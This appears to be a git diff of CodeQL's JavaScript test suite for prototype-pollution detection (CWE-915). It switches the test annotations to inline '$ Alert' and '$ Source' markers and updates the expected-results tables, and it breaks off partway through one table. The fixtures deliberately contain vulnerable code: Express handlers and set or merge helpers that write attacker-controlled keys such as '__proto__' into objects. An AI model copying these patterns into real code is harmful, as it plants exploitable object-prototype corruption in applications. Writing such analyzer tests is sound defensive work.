$@. | tst.js:5:24:5:37 | req.query.data | user controlled input | +| tst.js:48:9:48:11 | obj | tst.js:5:24:5:37 | req.query.data | tst.js:48:9:48:11 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | +| tst.js:80:5:80:17 | object[taint] | tst.js:77:24:77:37 | req.query.data | tst.js:80:5:80:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:77:24:77:37 | req.query.data | user controlled input | +| tst.js:82:5:82:22 | object["" + taint] | tst.js:77:24:77:37 | req.query.data | tst.js:82:5:82:22 | object["" + taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:77:24:77:37 | req.query.data | user controlled input | +| tst.js:87:9:87:21 | object[taint] | tst.js:77:24:77:37 | req.query.data | tst.js:87:9:87:21 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:77:24:77:37 | req.query.data | user controlled input | +| tst.js:94:5:94:37 | obj[req ... ', '')] | tst.js:94:9:94:19 | req.query.x | tst.js:94:5:94:37 | obj[req ... ', '')] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:94:9:94:19 | req.query.x | user controlled input | +| tst.js:97:5:97:46 | obj[req ... g, '')] | tst.js:97:9:97:19 | req.query.x | tst.js:97:5:97:46 | obj[req ... g, '')] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:97:9:97:19 | req.query.x | user controlled input | +| tst.js:105:5:105:17 | object[taint] | tst.js:102:24:102:37 | req.query.data | tst.js:105:5:105:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:102:24:102:37 | req.query.data | user controlled input | +| tst.js:130:5:130:53 | obj[req ... ), '')] | tst.js:130:9:130:19 | req.query.x | tst.js:130:5:130:53 | obj[req ... ), '')] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:130:9:130:19 | req.query.x | user controlled input | edges | lib.js:1:38:1:40 | obj | lib.js:6:7:6:9 | obj | provenance | | | lib.js:1:43:1:46 | path | lib.js:2:21:2:24 | path | provenance | | @@ -239,31 +267,3 @@ nodes | tst.js:130:9:130:52 | req.que ... '), '') | semmle.label | req.que ... '), '') | subpaths | tst.js:14:27:14:31 | taint | tst.js:55:29:55:32 | prop | tst.js:56:12:56:33 | obj ? o ... : null | tst.js:14:5:14:32 | unsafeG ... taint) | -#select -| lib.js:6:7:6:9 | obj | lib.js:1:43:1:46 | path | lib.js:6:7:6:9 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:1:43:1:46 | path | library input | -| lib.js:15:3:15:14 | obj[path[0]] | lib.js:14:38:14:41 | path | lib.js:15:3:15:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:14:38:14:41 | path | library input | -| lib.js:22:3:22:14 | obj[path[0]] | lib.js:20:14:20:22 | arguments | lib.js:22:3:22:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:20:14:20:22 | arguments | library input | -| lib.js:26:10:26:21 | obj[path[0]] | lib.js:25:44:25:47 | path | lib.js:26:10:26:21 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:25:44:25:47 | path | library input | -| lib.js:34:3:34:14 | obj[path[0]] | lib.js:30:43:30:51 | arguments | lib.js:34:3:34:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:30:43:30:51 | arguments | library input | -| lib.js:42:3:42:14 | obj[path[0]] | lib.js:38:27:38:35 | arguments | lib.js:42:3:42:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:38:27:38:35 | arguments | library input | -| lib.js:87:10:87:14 | proto | lib.js:83:14:83:22 | arguments | lib.js:87:10:87:14 | proto | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:83:14:83:22 | arguments | library input | -| lib.js:108:3:108:10 | obj[one] | lib.js:104:13:104:21 | arguments | lib.js:108:3:108:10 | obj[one] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:104:13:104:21 | arguments | library input | -| lib.js:119:13:119:24 | obj[path[0]] | lib.js:118:29:118:32 | path | lib.js:119:13:119:24 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:118:29:118:32 | path | library input | -| lib.js:128:9:128:20 | obj[path[0]] | lib.js:127:14:127:17 | path | lib.js:128:9:128:20 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:127:14:127:17 | path | library input | -| otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] | otherlib/src/otherlibimpl.js:1:37:1:40 | path | otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | otherlib/src/otherlibimpl.js:1:37:1:40 | path | library input | -| sublib/other.js:6:7:6:18 | obj[path[0]] | sublib/other.js:5:28:5:31 | path | sublib/other.js:6:7:6:18 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | sublib/other.js:5:28:5:31 | path | library input | -| sublib/sub.js:2:3:2:14 | obj[path[0]] | sublib/sub.js:1:37:1:40 | path | sublib/sub.js:2:3:2:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | sublib/sub.js:1:37:1:40 | path | library input | -| tst.js:8:5:8:17 | object[taint] | tst.js:5:24:5:37 | req.query.data | tst.js:8:5:8:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | -| tst.js:9:5:9:17 | object[taint] | tst.js:5:24:5:37 | req.query.data | tst.js:9:5:9:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | -| tst.js:14:5:14:32 | unsafeG ... taint) | tst.js:5:24:5:37 | req.query.data | tst.js:14:5:14:32 | unsafeG ... taint) | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | -| tst.js:34:5:34:7 | obj | tst.js:5:24:5:37 | req.query.data | tst.js:34:5:34:7 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | -| tst.js:39:9:39:11 | obj | tst.js:5:24:5:37 | req.query.data | tst.js:39:9:39:11 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | -| tst.js:45:9:45:11 | obj | tst.js:5:24:5:37 | req.query.data | tst.js:45:9:45:11 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | -| tst.js:48:9:48:11 | obj | tst.js:5:24:5:37 | req.query.data | tst.js:48:9:48:11 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | -| tst.js:80:5:80:17 | object[taint] | tst.js:77:24:77:37 | req.query.data | tst.js:80:5:80:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:77:24:77:37 | req.query.data | user controlled input | -| tst.js:82:5:82:22 | object["" + taint] | tst.js:77:24:77:37 | req.query.data | tst.js:82:5:82:22 | object["" + taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:77:24:77:37 | req.query.data | user controlled input | -| tst.js:87:9:87:21 | object[taint] | tst.js:77:24:77:37 | req.query.data | tst.js:87:9:87:21 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:77:24:77:37 | req.query.data | user controlled input | -| tst.js:94:5:94:37 | obj[req ... ', '')] | tst.js:94:9:94:19 | req.query.x | tst.js:94:5:94:37 | obj[req ... ', '')] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:94:9:94:19 | req.query.x | user controlled input | -| tst.js:97:5:97:46 | obj[req ... g, '')] | tst.js:97:9:97:19 | req.query.x | tst.js:97:5:97:46 | obj[req ... g, '')] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:97:9:97:19 | req.query.x | user controlled input | -| tst.js:105:5:105:17 | object[taint] | tst.js:102:24:102:37 | req.query.data | tst.js:105:5:105:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:102:24:102:37 | req.query.data | user controlled input | -| tst.js:130:5:130:53 | obj[req ... ), '')] | tst.js:130:9:130:19 | req.query.x | tst.js:130:5:130:53 | obj[req ... ), '')] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:130:9:130:19 | req.query.x | user controlled input | diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/PrototypePollutingAssignment.qlref b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/PrototypePollutingAssignment.qlref index 107951e169e1..3c441784c3b7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/PrototypePollutingAssignment.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/PrototypePollutingAssignment.qlref @@ -1 +1,2 @@ -Security/CWE-915/PrototypePollutingAssignment.ql \ No newline at end of file +query: Security/CWE-915/PrototypePollutingAssignment.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js index fb550533d124..1c0563d679b5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js @@ -1,9 +1,9 @@ -module.exports.set = function recSet(obj, path, value) { +module.exports.set = function recSet(obj, path, value) { // $ Source var currentPath = path[0]; var currentValue = obj[currentPath]; if (path.length === 1) { if (currentValue === void 0) { - obj[currentPath] = value; // NOT OK + obj[currentPath] = value; // $ Alert } return currentValue; } @@ -11,35 +11,35 @@ module.exports.set = function recSet(obj, path, value) { return recSet(obj[currentPath], path.slice(1), value); } -module.exports.set2 = function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK +module.exports.set2 = function (obj, path, value) { // $ Source + obj[path[0]][path[1]] = value; // $ Alert } module.exports.setWithArgs = function() { var obj = arguments[0]; - var path = arguments[1]; + var path = arguments[1]; // $ Source var value = arguments[2]; - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } -module.exports.usedInTest = function (obj, path, value) { - return obj[path[0]][path[1]] = value; // NOT OK +module.exports.usedInTest = function (obj, path, value) { // $ Source + return obj[path[0]][path[1]] = value; // $ Alert } module.exports.setWithArgs2 = function() { - const args = Array.prototype.slice.call(arguments); + const args = Array.prototype.slice.call(arguments); // $ Source var obj = args[0]; var path = args[1]; var value = args[2]; - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } module.exports.setWithArgs3 = function() { - const args = Array.from(arguments); + const args = Array.from(arguments); // $ Source var obj = args[0]; var path = args[1]; var value = args[2]; - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } function id(s) { @@ -52,7 +52,7 @@ module.exports.notVulnerable = function () { const path = id("x"); const value = id("y"); const obj = id("z"); - return (obj[path[0]][path[1]] = value); // OK + return (obj[path[0]][path[1]] = value); } class Foo { @@ -67,12 +67,12 @@ class Foo { const obj = this.obj; const path = this.path; const value = this.value; - return (obj[path[0]][path[1]] = value); // NOT OK + return (obj[path[0]][path[1]] = value); // $ MISSING: Alert - lacking local field step } safe() { const obj = this.obj; - obj[path[0]] = this.value; // OK + obj[path[0]] = this.value; } } @@ -80,11 +80,11 @@ module.exports.Foo = Foo; module.exports.delete = function() { var obj = arguments[0]; - var path = arguments[1]; - delete obj[path[0]]; // OK + var path = arguments[1]; // $ Source + delete obj[path[0]]; var prop = arguments[2]; var proto = obj[path[0]]; - delete proto[prop]; // NOT OK + delete proto[prop]; // $ Alert } module.exports.fixedProp = function (obj, path, value) { @@ -101,22 +101,22 @@ function isPossibilityOfPrototypePollution(key) { module.exports.sanWithFcuntion = function() { var obj = arguments[0]; - var one = arguments[1]; + var one = arguments[1]; // $ Source var two = arguments[2]; var value = arguments[3]; - obj[one][two] = value; // NOT OK + obj[one][two] = value; // $ Alert if (isPossibilityOfPrototypePollution(one) || isPossibilityOfPrototypePollution(two)) { throw new Error('Prototype pollution is not allowed'); } - obj[one][two] = value; // OK + obj[one][two] = value; } module.exports.returnsObj = function () { return { - set: function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + set: function (obj, path, value) { // $ Source + obj[path[0]][path[1]] = value; // $ Alert } } } @@ -124,8 +124,8 @@ module.exports.returnsObj = function () { class MyClass { constructor() {} - set(obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + set(obj, path, value) { // $ Source + obj[path[0]][path[1]] = value; // $ Alert } static staticSet(obj, path, value) { diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js index d74de12493aa..d1a00cfcc643 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js @@ -1,3 +1,3 @@ -module.exports.set = function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK +module.exports.set = function (obj, path, value) { // $ Source + obj[path[0]][path[1]] = value; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js index 4d3e7a82f5c8..d0b7b4098a26 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js @@ -2,8 +2,8 @@ function Foobar() {} Foobar.prototype = { - method: function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + method: function (obj, path, value) { // $ Source + obj[path[0]][path[1]] = value; // $ Alert }, }; diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js index 66db628cfcc0..3ee6bef9f4ef 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js @@ -1,5 +1,5 @@ -module.exports.set = function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK +module.exports.set = function (obj, path, value) { // $ Source + obj[path[0]][path[1]] = value; // $ Alert } var other = require('./other') diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js index a622a8913905..91fb71941b36 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js @@ -2,53 +2,53 @@ let express = require('express'); let app = express(); app.get('/', (req, res) => { - let taint = String(req.query.data); + let taint = String(req.query.data); // $ Source let object = {}; - object[taint][taint] = taint; // NOT OK - object[taint].foo = 'bar'; // NOT OK - may pollute, although attacker has no control over data being injected - object.baz[taint] = taint; // OK + object[taint][taint] = taint; // $ Alert + object[taint].foo = 'bar'; // $ Alert - may pollute, although attacker has no control over data being injected + object.baz[taint] = taint; mutateObject(object[taint], 'blah'); - unsafeGetProp(object, taint).foo = 'bar'; // NOT OK - unsafeGetProp(object, 'safe').foo = 'bar'; // OK + unsafeGetProp(object, taint).foo = 'bar'; // $ Alert + unsafeGetProp(object, 'safe').foo = 'bar'; - safeGetProp(object, taint).foo = 'bar'; // OK + safeGetProp(object, taint).foo = 'bar'; let possiblyProto = object[taint] || new Box(); possiblyProto.m(); let prototypeLessObject = Object.create(null); - prototypeLessObject[taint][taint] = taint; // OK + prototypeLessObject[taint][taint] = taint; let directlyMutated = {}; directlyMutated[taint] = taint; // OK - can't affect Object.prototype if (object.hasOwnProperty(taint)) { - object[taint].foo = 'bar'; // OK + object[taint].foo = 'bar'; } }); function mutateObject(obj, x) { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert if (obj instanceof Object) { - obj.foo = x; // OK + obj.foo = x; } if (obj != null) { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj === 'function') { - obj.foo = x; // OK + obj.foo = x; } if (typeof obj !== 'function') { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj === 'object') { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj !== 'object') { - obj.foo = x; // OK + obj.foo = x; } } @@ -74,42 +74,42 @@ class Box { app.get('/', (req, res) => { - let taint = String(req.query.data); + let taint = String(req.query.data); // $ Source let object = {}; - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert - object["" + taint]["" + taint] = taint; // NOT OK + object["" + taint]["" + taint] = taint; // $ Alert if (!taint.includes("__proto__")) { - object[taint][taint] = taint; // OK + object[taint][taint] = taint; } else { - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert } }); app.get('/foo', (req, res) => { let obj = {}; - obj[req.query.x.replace('_', '-')].x = 'foo'; // OK - obj[req.query.x.replace('_', '')].x = 'foo'; // NOT OK - obj[req.query.x.replace(/_/g, '')].x = 'foo'; // OK - obj[req.query.x.replace(/_/g, '-')].x = 'foo'; // OK - obj[req.query.x.replace(/__proto__/g, '')].x = 'foo'; // NOT OK - "__pr__proto__oto__" - obj[req.query.x.replace('o', '0')].x = 'foo'; // OK + obj[req.query.x.replace('_', '-')].x = 'foo'; + obj[req.query.x.replace('_', '')].x = 'foo'; // $ Alert + obj[req.query.x.replace(/_/g, '')].x = 'foo'; + obj[req.query.x.replace(/_/g, '-')].x = 'foo'; + obj[req.query.x.replace(/__proto__/g, '')].x = 'foo'; // $ Alert - "__pr__proto__oto__" + obj[req.query.x.replace('o', '0')].x = 'foo'; }); app.get('/bar', (req, res) => { - let taint = String(req.query.data); + let taint = String(req.query.data); // $ Source let object = {}; - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert const bad = ["__proto__", "constructor"]; if (bad.includes(taint)) { return; } - object[taint][taint] = taint; // OK + object[taint][taint] = taint; }); app.get('/assign', (req, res) => { @@ -126,7 +126,7 @@ app.get('/assign', (req, res) => { app.get('/foo', (req, res) => { let obj = {}; - obj[req.query.x.replace(new RegExp('_', 'g'), '')].x = 'foo'; // OK - obj[req.query.x.replace(new RegExp('_', ''), '')].x = 'foo'; // NOT OK - obj[req.query.x.replace(new RegExp('_', unknownFlags()), '')].x = 'foo'; // OK + obj[req.query.x.replace(new RegExp('_', 'g'), '')].x = 'foo'; + obj[req.query.x.replace(new RegExp('_', ''), '')].x = 'foo'; // $ Alert + obj[req.query.x.replace(new RegExp('_', unknownFlags()), '')].x = 'foo'; }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/PrototypePollutingFunction.expected b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/PrototypePollutingFunction.expected index bc4a6e4456a8..4546ee4b6aab 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/PrototypePollutingFunction.expected +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/PrototypePollutingFunction.expected @@ -1,656 +1,36 @@ -nodes -| examples/PrototypePollutingFunction.js:1:16:1:18 | dst | semmle.label | dst | -| examples/PrototypePollutingFunction.js:1:21:1:23 | src | semmle.label | src | -| examples/PrototypePollutingFunction.js:2:14:2:16 | key | semmle.label | key | -| examples/PrototypePollutingFunction.js:5:19:5:21 | dst | semmle.label | dst | -| examples/PrototypePollutingFunction.js:5:19:5:26 | dst[key] | semmle.label | dst[key] | -| examples/PrototypePollutingFunction.js:5:23:5:25 | key | semmle.label | key | -| examples/PrototypePollutingFunction.js:5:29:5:31 | src | semmle.label | src | -| examples/PrototypePollutingFunction.js:5:29:5:36 | src[key] | semmle.label | src[key] | -| examples/PrototypePollutingFunction.js:5:33:5:35 | key | semmle.label | key | -| examples/PrototypePollutingFunction.js:7:13:7:15 | dst | semmle.label | dst | -| examples/PrototypePollutingFunction.js:7:17:7:19 | key | semmle.label | key | -| examples/PrototypePollutingFunction.js:7:24:7:26 | src | semmle.label | src | -| examples/PrototypePollutingFunction.js:7:24:7:31 | src[key] | semmle.label | src[key] | -| examples/PrototypePollutingFunction.js:7:28:7:30 | key | semmle.label | key | -| examples/PrototypePollutingFunction_fixed2.js:1:21:1:23 | src | semmle.label | src | -| examples/PrototypePollutingFunction_fixed2.js:6:29:6:31 | src | semmle.label | src | -| examples/PrototypePollutingFunction_fixed2.js:6:29:6:36 | src[key] | semmle.label | src[key] | -| examples/PrototypePollutingFunction_fixed2.js:8:24:8:26 | src | semmle.label | src | -| examples/PrototypePollutingFunction_fixed2.js:8:24:8:31 | src[key] | semmle.label | src[key] | -| examples/PrototypePollutingFunction_fixed.js:1:21:1:23 | src | semmle.label | src | -| examples/PrototypePollutingFunction_fixed.js:2:14:2:16 | key | semmle.label | key | -| examples/PrototypePollutingFunction_fixed.js:5:29:5:31 | src | semmle.label | src | -| examples/PrototypePollutingFunction_fixed.js:5:29:5:36 | src[key] | semmle.label | src[key] | -| examples/PrototypePollutingFunction_fixed.js:7:17:7:19 | key | semmle.label | key | -| examples/PrototypePollutingFunction_fixed.js:7:24:7:26 | src | semmle.label | src | -| examples/PrototypePollutingFunction_fixed.js:7:24:7:31 | src[key] | semmle.label | src[key] | -| examples/PrototypePollutingFunction_fixed.js:7:28:7:30 | key | semmle.label | key | -| path-assignment.js:8:13:8:25 | key | semmle.label | key | -| path-assignment.js:8:19:8:25 | keys[i] | semmle.label | keys[i] | -| path-assignment.js:13:13:13:32 | target | semmle.label | target | -| path-assignment.js:13:22:13:27 | target | semmle.label | target | -| path-assignment.js:13:22:13:32 | target[key] | semmle.label | target[key] | -| path-assignment.js:13:29:13:31 | key | semmle.label | key | -| path-assignment.js:15:13:15:18 | target | semmle.label | target | -| path-assignment.js:15:20:15:22 | key | semmle.label | key | -| path-assignment.js:41:13:41:25 | key | semmle.label | key | -| path-assignment.js:41:19:41:25 | keys[i] | semmle.label | keys[i] | -| path-assignment.js:42:9:42:48 | target | semmle.label | target | -| path-assignment.js:42:18:42:23 | target | semmle.label | target | -| path-assignment.js:42:25:42:27 | key | semmle.label | key | -| path-assignment.js:42:32:42:37 | target | semmle.label | target | -| path-assignment.js:42:32:42:42 | target[key] | semmle.label | target[key] | -| path-assignment.js:42:32:42:48 | target[key] \|\| {} | semmle.label | target[key] \|\| {} | -| path-assignment.js:42:39:42:41 | key | semmle.label | key | -| path-assignment.js:44:5:44:10 | target | semmle.label | target | -| path-assignment.js:44:12:44:18 | keys[i] | semmle.label | keys[i] | -| path-assignment.js:58:13:58:25 | key | semmle.label | key | -| path-assignment.js:58:19:58:25 | keys[i] | semmle.label | keys[i] | -| path-assignment.js:59:9:59:48 | target | semmle.label | target | -| path-assignment.js:59:18:59:23 | target | semmle.label | target | -| path-assignment.js:59:25:59:27 | key | semmle.label | key | -| path-assignment.js:59:32:59:37 | target | semmle.label | target | -| path-assignment.js:59:32:59:42 | target[key] | semmle.label | target[key] | -| path-assignment.js:59:32:59:48 | target[key] \|\| {} | semmle.label | target[key] \|\| {} | -| path-assignment.js:59:39:59:41 | key | semmle.label | key | -| path-assignment.js:61:5:61:10 | target | semmle.label | target | -| path-assignment.js:61:12:61:18 | keys[i] | semmle.label | keys[i] | -| path-assignment.js:68:13:68:25 | key | semmle.label | key | -| path-assignment.js:68:19:68:25 | keys[i] | semmle.label | keys[i] | -| path-assignment.js:69:9:69:48 | target | semmle.label | target | -| path-assignment.js:69:18:69:23 | target | semmle.label | target | -| path-assignment.js:69:25:69:27 | key | semmle.label | key | -| path-assignment.js:69:32:69:37 | target | semmle.label | target | -| path-assignment.js:69:32:69:42 | target[key] | semmle.label | target[key] | -| path-assignment.js:69:32:69:48 | target[key] \|\| {} | semmle.label | target[key] \|\| {} | -| path-assignment.js:69:39:69:41 | key | semmle.label | key | -| path-assignment.js:71:5:71:10 | target | semmle.label | target | -| path-assignment.js:71:12:71:18 | keys[i] | semmle.label | keys[i] | -| tests.js:3:25:3:27 | dst | semmle.label | dst | -| tests.js:3:30:3:32 | src | semmle.label | src | -| tests.js:4:14:4:16 | key | semmle.label | key | -| tests.js:6:28:6:30 | dst | semmle.label | dst | -| tests.js:6:28:6:35 | dst[key] | semmle.label | dst[key] | -| tests.js:6:32:6:34 | key | semmle.label | key | -| tests.js:6:38:6:40 | src | semmle.label | src | -| tests.js:6:38:6:45 | src[key] | semmle.label | src[key] | -| tests.js:6:42:6:44 | key | semmle.label | key | -| tests.js:8:13:8:15 | dst | semmle.label | dst | -| tests.js:8:17:8:19 | key | semmle.label | key | -| tests.js:8:24:8:26 | src | semmle.label | src | -| tests.js:8:24:8:31 | src[key] | semmle.label | src[key] | -| tests.js:8:28:8:30 | key | semmle.label | key | -| tests.js:13:24:13:26 | dst | semmle.label | dst | -| tests.js:13:29:13:31 | src | semmle.label | src | -| tests.js:14:17:14:19 | src | semmle.label | src | -| tests.js:14:30:14:32 | key | semmle.label | key | -| tests.js:16:27:16:29 | dst | semmle.label | dst | -| tests.js:16:27:16:34 | dst[key] | semmle.label | dst[key] | -| tests.js:16:31:16:33 | key | semmle.label | key | -| tests.js:16:37:16:39 | src | semmle.label | src | -| tests.js:16:37:16:44 | src[key] | semmle.label | src[key] | -| tests.js:16:41:16:43 | key | semmle.label | key | -| tests.js:18:13:18:15 | dst | semmle.label | dst | -| tests.js:18:17:18:19 | key | semmle.label | key | -| tests.js:18:24:18:26 | src | semmle.label | src | -| tests.js:18:24:18:31 | src[key] | semmle.label | src[key] | -| tests.js:18:28:18:30 | key | semmle.label | key | -| tests.js:23:19:23:21 | dst | semmle.label | dst | -| tests.js:23:27:23:33 | sources [0] | semmle.label | sources [0] | -| tests.js:24:14:24:19 | source | semmle.label | source | -| tests.js:24:24:24:30 | sources [0] | semmle.label | sources [0] | -| tests.js:25:18:25:20 | key | semmle.label | key | -| tests.js:26:25:26:27 | dst | semmle.label | dst | -| tests.js:26:30:26:35 | source | semmle.label | source | -| tests.js:26:30:26:40 | source[key] | semmle.label | source[key] | -| tests.js:26:37:26:39 | key | semmle.label | key | -| tests.js:26:43:26:45 | key | semmle.label | key | -| tests.js:31:22:31:24 | dst | semmle.label | dst | -| tests.js:31:27:31:31 | value | semmle.label | value | -| tests.js:31:34:31:36 | key | semmle.label | key | -| tests.js:32:9:32:27 | dstValue | semmle.label | dstValue | -| tests.js:32:20:32:22 | dst | semmle.label | dst | -| tests.js:32:20:32:27 | dst[key] | semmle.label | dst[key] | -| tests.js:32:24:32:26 | key | semmle.label | key | -| tests.js:34:18:34:25 | dstValue | semmle.label | dstValue | -| tests.js:34:28:34:32 | value | semmle.label | value | -| tests.js:36:9:36:11 | dst | semmle.label | dst | -| tests.js:36:13:36:15 | key | semmle.label | key | -| tests.js:36:20:36:24 | value | semmle.label | value | -| tests.js:40:27:40:29 | dst | semmle.label | dst | -| tests.js:40:32:40:34 | src | semmle.label | src | -| tests.js:41:14:41:16 | key | semmle.label | key | -| tests.js:44:30:44:32 | dst | semmle.label | dst | -| tests.js:44:30:44:37 | dst[key] | semmle.label | dst[key] | -| tests.js:44:34:44:36 | key | semmle.label | key | -| tests.js:44:40:44:42 | src | semmle.label | src | -| tests.js:44:40:44:47 | src[key] | semmle.label | src[key] | -| tests.js:44:44:44:46 | key | semmle.label | key | -| tests.js:46:13:46:15 | dst | semmle.label | dst | -| tests.js:46:17:46:19 | key | semmle.label | key | -| tests.js:46:24:46:26 | src | semmle.label | src | -| tests.js:46:24:46:31 | src[key] | semmle.label | src[key] | -| tests.js:46:28:46:30 | key | semmle.label | key | -| tests.js:51:26:51:28 | dst | semmle.label | dst | -| tests.js:51:31:51:33 | src | semmle.label | src | -| tests.js:52:14:52:16 | key | semmle.label | key | -| tests.js:55:29:55:31 | dst | semmle.label | dst | -| tests.js:55:29:55:36 | dst[key] | semmle.label | dst[key] | -| tests.js:55:33:55:35 | key | semmle.label | key | -| tests.js:55:39:55:41 | src | semmle.label | src | -| tests.js:55:39:55:46 | src[key] | semmle.label | src[key] | -| tests.js:55:43:55:45 | key | semmle.label | key | -| tests.js:57:13:57:15 | dst | semmle.label | dst | -| tests.js:57:17:57:19 | key | semmle.label | key | -| tests.js:57:24:57:26 | src | semmle.label | src | -| tests.js:57:24:57:31 | src[key] | semmle.label | src[key] | -| tests.js:57:28:57:30 | key | semmle.label | key | -| tests.js:62:33:62:35 | src | semmle.label | src | -| tests.js:66:41:66:43 | src | semmle.label | src | -| tests.js:66:41:66:48 | src[key] | semmle.label | 